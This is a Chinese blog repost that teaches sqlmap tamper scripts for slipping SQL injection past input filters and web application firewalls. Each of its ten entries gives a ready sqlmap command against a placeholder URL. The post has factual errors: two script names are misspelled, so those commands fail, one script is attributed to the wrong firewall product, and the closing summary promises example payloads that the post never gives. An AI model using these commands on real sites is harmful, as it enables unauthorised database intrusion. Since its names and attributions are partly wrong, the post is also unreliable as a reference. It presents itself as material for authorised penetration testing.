Sqlmap学习 Tamper绕过脚本

admin 2024年9月28日12:03:08评论55 views字数 1496阅读4分59秒阅读模式
在网络安全领域,SQL 注入是一种常见的攻击方式。SQLMap 是一款强大的工具,可用于检测和利用这种漏洞。然而,为了绕过各种安全机制和防御策略,攻击者会使用多种技术。本文将详细介绍 SQLMap 中的一些绕过脚本。
一、apostrophemadk.py:绕过单引号
该脚本用于绕过应用程序中对单引号的过滤。例如:
sqlmap -u "http://example.com/page.php?id=1" --tamper=apostrophemadk
二、base64encode.py:使用 Base64 编码
该脚本将注入字符串使用 Base64 编码,绕过部分检测。例如:
sqlmap -u "http://example.com/page.php?id=1" --tamper=base64encode
三、multiplespaces.py:多个空格绕过
通过使用多个空格绕过过滤机制。例如:
sqlmap -u "http://example.com/page.php?id=1" --tamper=multiplespaces
四、space2plus.py:空格替换为加号
将空格替换为加号,绕过一些过滤机制。例如:
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2plus
五、nonrecursiverplacement.py:非递归替代
这个脚本通过替换关键字的部分字符,绕过一些检测。例如:
sqlmap -u "http://example.com/page.php?id=1" --tamper=nonrecursiverplacement
六、space2randomblank.py:空格随机替换
随机替换空格,增加检测难度。例如:
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2randomblank
七、unionalltounion.py:替换 UNION ALL 为 UNION
将 UNION ALL 替换为 UNION,绕过检测。例如:
sqlmap -u "http://example.com/page.php?id=1" --tamper=unionalltounion
八、securesphere.py:Barracuda WAF 绕过
用于绕过 Barracuda WAF 的脚本。例如:
sqlmap -u "http://example.com/page.php?id=1" --tamper=securesphere
九、space2hash.py:空格替换为哈希
将空格替换为哈希字符。例如:
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2hash
十、space2mssqlblank.py:空格替换为 MSSQL 注释
将空格替换为 MSSQL 注释,绕过过滤。例如:
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2mssqlblank
总结:
绕过脚本是 SQL 注入领域中的重要策略,攻击者使用这些脚本来欺骗和绕过应用程序的安全机制。本文介绍了多种绕过脚本,并为每个脚本提供详细的使用方式和示例 payload。在进行渗透测试或安全评估时,了解这些脚本可以帮助你更好地理解攻击者的技术手段,从而提高应对能力。然而,请务必在合法授权的环境下使用这些技术,遵循法律和道德准则。

关 注 有 礼

欢迎关注公众号:网络安全者

Sqlmap学习  Tamper绕过脚本

原文始发于微信公众号(网络安全者):Sqlmap学习 -- Tamper绕过脚本

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日12:03:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Sqlmap学习 Tamper绕过脚本https://cn-sec.com/archives/1995937.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息